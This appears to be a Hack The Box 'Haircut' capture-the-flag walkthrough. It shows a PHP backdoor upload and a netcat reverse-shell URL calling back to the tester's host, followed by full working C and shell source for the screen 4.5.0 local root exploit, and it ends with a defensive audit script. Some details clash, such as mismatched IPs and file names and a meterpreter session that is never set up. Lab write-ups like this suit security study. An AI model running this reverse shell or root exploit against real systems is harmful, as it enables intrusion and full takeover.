HTB – Haircut

Hello friends!! Today we are going to solve another CTF challenge, “Haircut”, which is categorised as a retired lab presented by Hack the Box for online penetration-testing practice. Solving the challenges in this lab is not that easy unless you have some knowledge of web application penetration testing (WAPT). Let's start and learn how to analyse a vulnerability in a network and then exploit it to retrieve the desired information.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are accessible online, they have a static IP. The IP of Haircut is 10.10.10.24, so let's start with nmap port enumeration.

From the image below, you can observe that ports 22 and 80 are open on the victim's machine.

Knowing that port 80 is open on the victim's machine, we opened its IP in a browser and saw the page shown in the image below.

Then I used the dirbuster tool with the directory-list-2.3-medium.txt wordlist for a directory brute-force attack on http://10.10.10.24 with the PHP file extension.

As a result, it found an uploads directory with a 403 response and an exposed.php file with a 200 OK response.

When we explored http://10.10.10.24/exposed.php we found a search page for finding the location of a hairdresser.

  • Visit http://10.10.10.24/exposed.php
  • You will find that it executes a curl command behind the scenes.
  • There is a folder called /uploads available. Let's upload our payload there.
  • Without wasting time, I used my PHP backdoor puck.php:
    http://10.10.14.28/puck.php -o uploads/puck.php
  • Execute the payload by visiting http://10.10.15.16/uploads/payload.php

Now we need to transfer our backdoor file to the target system, so first we run a Python web server on port 80 using the following command.

python -m SimpleHTTPServer 80

Once puck.php has been transferred to the target system, we still need to execute that file to get a reverse connection, so I simply open the following URL in a web browser.

http://10.10.10.24/uploads/puck.php?puck=nc -e /bin/sh 10.10.14.28 9876

After executing the uploaded backdoor file, come back to the netcat listener:

D:\>nc -lvp 9876
listening on [any] 9876 ...
10.10.10.24: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.28] from (UNKNOWN) [10.10.10.24] 46564: NO_DATA
ls
bounce.jpg
puck.php
python3 -c 'import pty;pty.spawn("/bin/bash")'

Now let's finish the task by grabbing the user.txt and root.txt files. First I moved into the home directory and checked the files and directories inside it.

Here I found a directory named maria; after exploring it we found many files and directories, and finally I fetched the user.txt file from /maria/Desktop/ and read it with the cat command.

Our first challenge is finished successfully; now let's move on to the second challenge.

Then, using the following command, we listed all files and directories that run with root permissions.

Here I noticed /usr/bin/screen-4.5.0, so let's check whether an exploit is available for it.

In a new terminal, we look for any exploit present in Exploit-DB for screen 4.5.0 with the help of searchsploit.

From the image below you can see the highlighted exploit 41154.sh, which is a shell script for local privilege escalation.

Since I didn't find a convenient way to run this shell script as-is for post-exploitation, I went with manual compilation and reviewed its code using the cat command.

If you look at the following code you will notice that the script contains C code, so we have divided it into three parts for manual compilation.

  • Copy the yellow-highlighted code, paste it into a text document and save it as libhax.c
  • Copy the orange-highlighted code, paste it into a text document and save it as rootshell.c
  • Finally, copy the remaining code, paste it into a text document and save it as 41154.sh

From the image below you can see that I have pasted the copied code into rootshell.c:

#include <stdio.h>
#include <unistd.h>

int main(void){
    /* libhax.so has already made this binary setuid root, so these calls succeed */
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* execvp takes the file and a NULL-terminated argv (the original had a stray third argument) */
    char *argv[] = {"/bin/sh", NULL};
    execvp("/bin/sh", argv);
    return 1; /* only reached if exec fails */
}

From the image below you can see that I have pasted the copied code into libhax.c:

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/* runs automatically when the library is loaded through /etc/ld.so.preload */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);   /* make rootshell owned by root */
    chmod("/tmp/rootshell", 04755);  /* and set the setuid bit */
    unlink("/etc/ld.so.preload");    /* remove the preload file again */
    printf("[+] done!\n");
}

From the image below you can see that I have pasted the remaining code into 41154.sh and saved all three text documents on the desktop in a new folder named shell.

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

Let's compile our C program files manually on our local system using gcc as shown below.

Similarly, compile the rootshell.c file with the following command.

From the image below you can see all the files stored in our shell folder; now let's upload them to the target system through our previous meterpreter session.

Since /tmp has read and write permission, we upload all the files into the /tmp directory by executing the following command.

Again, to spawn a proper TTY shell on the target system we need to use Python's pty module, so I ran the following command inside the meterpreter shell.

Open the 41154.sh file, as it contains the commands for getting root privileges, as shown below.

Execute the following command and get root.

Here I got the root.txt file; now let's open it with the cat command and finish our second challenge.

$ /tmp/rootshell
/tmp/rootshell
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
4c---------51
#
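As an added defender-side check (not part of this writeup or of the exploit), the following POSIX shell script audits a host for the two conditions this escalation relies on: entries in /etc/ld.so.preload that point outside the system library directories, and a screen binary carrying the setuid bit. The file and binary paths are parameters (an assumption for testing) and default to the real locations.

```shell
#!/bin/sh
# Audit for the screen-4.5.0 ld.so.preload abuse. Added example, not the
# exploit's or the writeup's code. The exploit writes "\n/tmp/libhax.so" into
# /etc/ld.so.preload with no trailing newline, so the reader below keeps a
# final line that lacks one and skips the blank leading line.

# check_preload [file]: prints each suspicious entry, returns 1 if any found.
check_preload() {
    preload="${1:-/etc/ld.so.preload}"
    status=0
    [ -f "$preload" ] || return 0               # nothing preloaded, nothing to flag
    # `|| [ -n "$entry" ]` keeps a last line that has no trailing newline
    while IFS= read -r entry || [ -n "$entry" ]; do
        [ -z "$entry" ] && continue             # skip blank lines
        case "$entry" in
            /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*) ;;   # normal library paths
            *) printf 'suspicious preload entry: %s\n' "$entry"; status=1 ;;
        esac
    done < "$preload"
    return "$status"
}

# check_setuid_screen [binary]: returns 1 if the given (or installed) screen is setuid.
check_setuid_screen() {
    bin="${1:-$(command -v screen 2>/dev/null)}"
    [ -n "$bin" ] || return 0                   # screen not installed
    if [ -u "$bin" ]; then
        printf 'setuid bit set on %s\n' "$bin"
        return 1
    fi
    return 0
}

# Usage on a live host: . ./preload_check.sh; check_preload; check_setuid_screen
```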

Wonderful!! We have completed the task and hacked this box.

Author: AArti Singh
